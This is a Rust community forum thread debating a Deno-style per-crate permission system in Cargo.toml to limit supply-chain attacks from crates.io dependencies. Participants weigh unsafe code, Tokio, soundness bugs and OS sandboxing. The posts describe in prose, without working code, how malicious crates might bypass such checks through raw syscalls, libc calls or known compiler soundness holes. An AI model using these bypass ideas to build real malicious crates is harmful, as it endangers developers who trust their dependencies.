Regarding the Security / Safety of Libraries on Crates.io

Ideator · October 23, 2021, 12:46pm

There isn't any system in place to prevent the sort of issues that reddit is talking about, is there?

If that's the case, what prevents us from adopting a deno-like approach with an explicit permission to each and every crate to do only what it's supposed to do?

Wouldn't require any breaking changes, just additional parameters to add to the .toml file:

[dependencies.tokio]
version = "1"
features = [ "full" ]
permissions = [ "full" ]
// broken down into "none", for simple functions,
// "fs" for file system access, "net" for sockets,
// "web-full" for access to all web-sites & resources,
// "domain:youtube.com" for YouTube libraries, etc.

One of the posts in that thread covered quite succinctly the reasons why these problems continue re-appearing, it's just not realistic to expect people to do more work for the same amount of benefit. So why don't we give everyone a better (and safer, not only in terms of memory this time) option?

A global permission specifier wouldn't hurt either:

[dependencies.all] // applicable to all used crates
permissions = [ "fs" ]

Heliozoa · October 23, 2021, 1:18pm

Some previous discussion, with the first reply linking to several more relevant threads: About supply-chain attacks - Rust Internals. I'm not sure if there's been any developments since then. I haven't seen anyone say that this can't be done, mainly concerns that this may be difficult to do in a robust manner.

See also GitHub - bytecodealliance/cap-std: Capability-oriented version of the Rust standard library

cole-miller · October 23, 2021, 1:23pm

This would require some kind of additional run-time instrumentation of the compiled artifacts, right? That sounds like a non-starter to me for a systems programming language, in addition to being a lot of engineering work.

Ideator · October 23, 2021, 4:00pm

Awesome, so it's been on the mind of some people before - good to know.

Great approach, quite similar to Deno, by the looks of it. But expecting people to switch to a more security-oriented version of the standard library just because it's safe, most likely isn't going to have any needed effect. Unless it gets adopted by the language itself, it will simply remain "yet another security thing". Not to mention the fact that just having a more secure standard library doesn't forbid anyone from introducing their own integrations with the underlying OS for their own purposes.

Not necessarily - all the checks can be done directly at compile-time.

First, we'd need to clarify and agree on about the kind of permissions that we care about. Deno's approach might be a good start, but in Rust's case at least the addition of the "unsafe" permission is necessary, for obvious reasons. File system access, permission to access the web - are all essential.

Once that is done, the work would pass to people, responsible for the standard library, as long with maintainers of the most popular independent (async) alternatives - such as tokio and async-std.

Any function that can be used to read from file system would get either a comment or a procedural macro of this kind: #[requires(fs_read)]. Any function that can access the web: #[requires(web)] and so on. These would get parsed at compile-time and checked against the permissions, specified in .toml file. If it isn't there, the whole body of the function can be replaced by a panic! macro with the details about the function call - and who called it in the first place.

Since unsafe code stands out on its own, no annotations are going to be needed there - any unsafe call or a function can thus be either removed or replaced by some version of panic! as well.

With that out of the way, there's no room left for anyone to exploit neither the functionality of the standard library, nor its counterparts. You can steal all the passwords that you want, but if neither the functionality in the standard library, nor in the tokio / async-std / smol / mio is enabled for you to transmit it, you won't get anything from anyone - and the user will be alerted during the tests that something went wrong when he tries to compile and run his program, believing that your id-hashmap does, indeed, provide some better alternative to the HashMap<Uuid, T> of the standard library.

Any code that is not annotated would be implicitly given #[requires(none)] - that is, it's a pure function can take in some data and return some back, nothing else. If you're writing a library and calling some other #[requires(fs_write)] functions from the standard library in such a function, you would be given a warning at first and a compilation error afterwards. This would force, in time, every crate author to explicitly specify which permissions are needed for their libraries - and with code analysis any crate could be trivially analyzed for annotations to make the crate author did his / her job properly.

In the end, you have a security system, enforced directly by the compiler - and specified by the end user of the libraries explicitly. No 2FA, no code reviews, no changes to crates.io needed. If you want to shoot yourself in the foot by allowing anything and everything to compile and run - it's your problem. The ecosystem gave you the best system possible, if you want to be dumb about it, it's your choice.

This is the kind of vision I would have in mind. And I don't see that many downsides to it, aside from a somewhat tedious process of annotating, along with a few additional compiler checks. Heck, I know I'd be the first to use it straight away - but do let me know if I'm only the one here.

tuxmain · October 23, 2021, 5:03pm

What if you communicate with fs/web/peripherals/etc. via a binding to an axternal API the compiler cannot check?

What if you are on a Unix-like system, where a lot of things use the filesystem? (sockets, serial ports, tty, FIFO...)

Does it mean that any use of unsafe will make your program require every feature?

droundy · October 23, 2021, 5:50pm

The problem is that this would automatically make all code that uses data structures transitively unsafe. It sounds like you're proposing to treat the standard library specially to avoid this, but it then means that you can't use any libraries like tokio or bindings to C libraries without granting full permissions, which is pretty much a nonstarter.

Edit I see this is redundant with the last sentence of @tuxmain post.

chrisd · October 23, 2021, 6:08pm

I'd be surprised if you can sandbox Rust code without literally sandboxing the build process. The Rust language itself was not designed for it and I'm not sure adding attributes will prevent clever workarounds.

See also: sandboxing Java applets within the browser. Or pysandbox.

I mean, I'm not against trying to do this but it'd be a big project and hard to get right. Personally I just think it'd be more fruitful to pursue proper OS sandboxing and having more ways to avoid build scripts (e.g. purpose built configuration files with security in mind).

Ideator · October 23, 2021, 6:16pm

The compiler can't check it - but you can specify whether the operation that's about to happen is related to file system, web or anything else, and whoever uses your crate will need to explicitly state that they want to give your library the permission to use those bindings. This will also simplify the review process of anyone interested in verifying their functionality later on.

Same thing, doesn't make any difference - as long as you specify what the requirements are, and the user of the library gives you these permissions, you're good to go.

Nope, it just means that only the libraries that need to use unsafe will be using unsafe. I probably should have expanded a bit more, so let me do that right now with a concrete example.

Say you're building a new console app. It starts off simple: you read some input from the user, saves it, does something with it, and later prints something back to the console. Basic I/O, nothing complicated, no access to the file system needed. You decide to import some library to parse the arguments provided to your chat using some new fancier alternative to clap you've just found. You know it shouldn't access anything other than stdin/stdout, so you don't specify any permissions for it (basic I/O is too harmless to do anything damaging anyway). You compile your program, you run it - and it crashes.

Turns out your alternative was trying to write something to your file system. The panic! discussed previously gets called with the arguments of the function that was called by your new library - to reveal that it was trying to create a key_log_and_crash.exe in your system32 folder by creating a new File handle. Would you have known that with full permissions being turned out?

Your program continues to grow. You decide to implement additional functionality, saving user's input to a file - and you decide to import tokio for that. For it to be able to access your file system, you specify permissions = [ "fs" ] in your .toml - it gets compiled and it works.

Now another library comes along, claiming that it just parses .json input that it uses - and thus needs no permissions whatsoever. Great - you add it in, and you run it, and you get another crash, when it tries to establish a remote connection with a totally unsuspicious remote server by creating a TcpStream through tokio. Another potential security threat caught.

A slightly more complex case would be the following: you decide to use a web framework now, based on tokio - which retrieves static files from the directory before serving them to the web. How do you handle this? It's got to have permissions for both fs and web - necessarily. How would you prevent it from reading what it doesn't have to and sending it somewhere else? This is where the approach of Flutter comes to the rescue. Separate configuration file for files and folders, which your app is allowed to access. Automatically passed as a permission for any libraries with fs_read / fs_write enabled. Should any call to any other file or a directory occur - once again, a loud panic! ensues.

As for the unsafe - there's nothing preventing anyone from only allowing tokio to call unsafe functions, while disallowing any other library from doing the same. If you say:

[dependencies.tokio]
version = "1"
features = [ "full" ]
permissions = [ "unsafe", "fs_read" ]

not_a_hack_tool = "0.1.3"
// implicit: permissions = [ "none" ]

Then a few additional checks can verify at compile-time that at no point the not_a_hack_tool ever calls in the unsafe parts of tokio. If it does, we have a problem. And if any libraries does need to rely on the permissions of another library, then it should state that as well:

[dependencies.some_lib]
version = "0.1"

[dependencies.some_lib.permissions]
tokio = [ "unsafe", "fs_read" ]

This is what I had in mind - it's not about sandboxing, but clarity about what is allowed to happen.

alice · October 23, 2021, 6:37pm

I mean, Tokio has unsafe in pretty much every single component. Preventing other libs from using unsafe code in Tokio is not going to get you very far - you have to allow this to let them use Tokio at all.

Ideator · October 23, 2021, 6:44pm

Guess we're stuck with manual reviews that no one will bother with, then - don't know what else to tell you. I'll see what I can hack around with myself, but there must have been a reason why Ryan Dahl decided to move away from Node's way of doing things in favor of Deno. If we can't be bothered to analyze mistakes of others and see what we can build on top of them, hey - maybe it wasn't meant to be. Let's wait until the next vulnerability pops up out of nowhere before having this conversation all over again - or not.

alice · October 23, 2021, 6:45pm

I mean, a variant of your suggestion is to say that not_a_hack_tool may not have any unsafe of its own, but is allowed to call code in Tokio that does.

Ideator · October 23, 2021, 6:50pm

There are different levels of unsafe-ness - you know it much better than I do, in case of a library like tokio there could an implicit permission to allow all things unsafe, but whomever happens to be calling tokio must only rely on their safe wrappers, that is

#[requires(fs_read)]
fn tokio_read() {
  do_something();
  unsafe {
    os_interfacing();
    read_from_to(...);
  }
} // calling this is okay, with a `fs_read` permission

But the library, relying on tokio, itself shouldn't be making any unsafe calls of its own, without explicit permissions - no declaring and no using any unsafe functions in its own crate. That's what I meant.

alice · October 23, 2021, 7:10pm

There are many ways you can approach the issue. Checking capabilities of libraries is one approach, and it has a bunch of technical challenges, but I'm sure you could find some sort of solution if you spend enough time on them. However, I'm not convinced that capabilities are the best solution. I think implementing mitigations that prevent unauthorized people from uploading malicious versions of libraries is a better strategy.

For example, here's one idea: There was an article earlier this month called Does the published crate match the upstream source?, which analyzed how often the published version of a crate actually corresponds to a specific commit in the repository. Imagine if crates.io had an automatic check when publishing a new version that the specified commit actually existed in the original repository, and also verified that the published code matches the commit. Then you need to compromise both the repository and the cargo publishing credentials to upload a malicious version.

quinedot · October 23, 2021, 7:38pm

The most readily available component of your suggestion is forbidding unsafe in dependencies. It's often been suggested (check the previous discussions). And one can argue the other constraints are meaningless if you have unsafe. But I don't think forbidding unsafe on dependencies at the project level mitigates the need for some sort of review.

Let's say you turn this on. Uh oh, half your dependencies use unsafe. Now, maybe there's a cultural or ecosystem change that can take place over time to change this. But some of those uses are legit, and we can't delay our project a decade hoping for the situation to improve regardless.

Already you (still) have to at least marginally review your deps.

OK, tokio is everywhere, lots of core Rust maintainers, surely someone has reviewed it... allow tokio to use unsafe. I mean, our project heavily depends on it anyway, so... .

Is this allowance transitive? If not... you'll have to review every transitive dependency, too. But if it is, and if any allowed crate has ua-browser-rs as a transitive dependency, you're still vulnerable.

I'm not arguing against more controls, but I don't think it gets you away from reviewing at all. I think tools to aid reviewing like crev are pretty crucial. Also worth mentioning is cargo audit, which adds a defensive layer even when reviewing is skimped.

Ideator · October 23, 2021, 8:30pm

That's a given - and I do believe that such mechanisms definitely should be put in place, but they rely on the intermediary package manager of the eco-system, not on the end user - which will still be forced to deal with the issue should any maliciousness slip through the cracks. Perhaps I'm a bit too hopeful about this, but giving the user of the crate the possibility to forcibly shut down any functionality from any crate that doesn't conform to his expectations is a much safer, albeit more complex, alternative.

I've probably done quite a terrible job explaining myself - because my suggestion was never about the concerns with unsafe functionality. Dealing with memory in a potentially unsound way has very little to do with the most common exploits that are continuously introduced in all sorts of packages to this day.

Are people going to rely on unsafe system calls to bake a crypto-miner into a package? Will they make raw system calls in order to place the right kind of keylogger in the right place, for it to get activated at right time? Or is it much likelier for them to rely on existing functions in the most popular crates to do whatever they'd like to do? This is what it boils down to.

To quote from the first link that @Heliozoa mentioned:

Summary

The threat model must assume that code can come from anybody, and libraries that accept code from unvetted strangers will outcompete libraries that only accept code after a rigorous vetting process (eg, I'm currently contributing to Raph Levien's druid; for all Raph knows, I'm a DGSE agent planted to introduce vulnerabilities in his code; Raph has done none of the thorough background checks that would be needed to prove this isn't the case; yet he's still taking my PRs).
The threat model must assume that people will be as lazy as they can afford to be when pulling dependencies. If people have a choice between a peer-reviewed dependency without the feature they need, and an unreviewed dependency with the feature, they will take the latter.
The threat model must assume that both attackers and legitimate developers can write code faster than people can review it.
The threat model must assume that some attackers will be sneaky and determined; if the ecosystem defends against supply chain attacks with heuristics, they will learn to game these heuristics. If the ecosystem only checks new crates for suspicious code, they will write non-suspicious code at first and add the actual vulnerability months later.

Introducing changes to crates.io doesn't deal with the issue. Removing all unsafe code is not practical. What remains is an explicit opt-in for specific functionality, allowed for specific crates. The clap shouldn't issue any TCP requests to any servers in India. A simple HTTP client shouldn't read any system files. All of these can (and should be - IMHO) enabled explicitly, as long as we have a common model of reference to work with. If Deno can do it, Rust can do it as well. As for the reliance on tokio and other packages, which are inherently unsafe - as long as there's an explicit opt-in for the specific functionality of tokio which is to be allowed for this particular crate, this isn't of any issue either.

Will this solve all security issues? Definitely not. But as long as each and every dependency is only allowed the bare minimum it can work with, the risk of accidental exploits is several orders of magnitude lower and orchestrating a complex attack is too much of a hassle for most people to bother with.

kryps · October 23, 2021, 8:47pm

If crates are allowed to use unsafe code they can just use inline assembly to do syscalls directly bypassing any security mechanisms of the Rust standard library. Or they can just call into libc like this... Or they can introduce all kinds of easily exploitable vulnerabilities.

So while this approach would make it a little bit harder to introduce exploits or vulnerabilities it would not offer any real protection.

Ideator · October 23, 2021, 8:52pm

True - but how likely is that to happen if you had to give any unknown crate an explicit permission to do these unsafe calls?

bjorn3 · October 23, 2021, 8:58pm

Forbidding unsafe code and requiring permission checks is uneffective for as long as rustc has soundness holes, as those allow you to write code using syscalls without the compiler knowing about this. There are currently 72 issues open labeld with I-unsound: Issues · rust-lang/rust · GitHub The oldest open soundness issue for example would allow transmuting an integer like the address of the syscall function in libc to a function pointer that can be safely called: Collisions in type_id · Issue #10389 · rust-lang/rust · GitHub As another example unsoundness relating to WF requirements on trait object types · Issue #44454 · rust-lang/rust · GitHub allows transmuting a reference with a limited lifetime to one with an 'static lifetime, thus allowing a use after free, which can be exploited to again call into libc. These issues are very unlikely to be hit accidentally, so rust does still provide a lot of safety over C/C++, but a malicious actor could easily exploit them.

scottmcm · October 23, 2021, 9:00pm

I think the core problem here is that this still needs manual review of the bottom level that actually provides these capabilities. There's no way to automate review that when something is making syscalls that it's using only the syscalls associated with the correct permission. And of course as soon as something has fs access, you end up wanting more than that, since you probably didn't want it reading any file. Not to mention that safety in the rust sense isn't security. It's safe to delete all your files. It's safe to upload your bitcoin wallet to pastebin.

What languages have succeeded in an in-language security model that lasted? Java and C# both tried but gave up, as I recall. I feel like making it the OS's responsibility -- Solaris Zones or whatever -- is the way forward (especially for anything that needs to call C code). Or maybe running in a limited environment like a WASM VM.

bjorn3 · October 23, 2021, 9:04pm

Java's motivation for removing permissions: JEP 411: Deprecate the Security Manager for Removal

C#'s deprecation notice: Breaking change: Most code access security APIs are obsolete - .NET | Microsoft Docs

Topic		Replies	Views
GitHub alternative community	14	1523	August 26, 2020
[Solved] Questions on Library Policy community	7	965	January 12, 2023
Is it possible to limit file system access to dependencies	11	1191	September 17, 2020
Static analysis of "permissions" needed by crate/mod? help	4	451	January 12, 2023
Security advisory for crates.io, 2017-09-19 announcements	9	12828	July 3, 2022

Regarding the Security / Safety of Libraries on Crates.io

Related Topics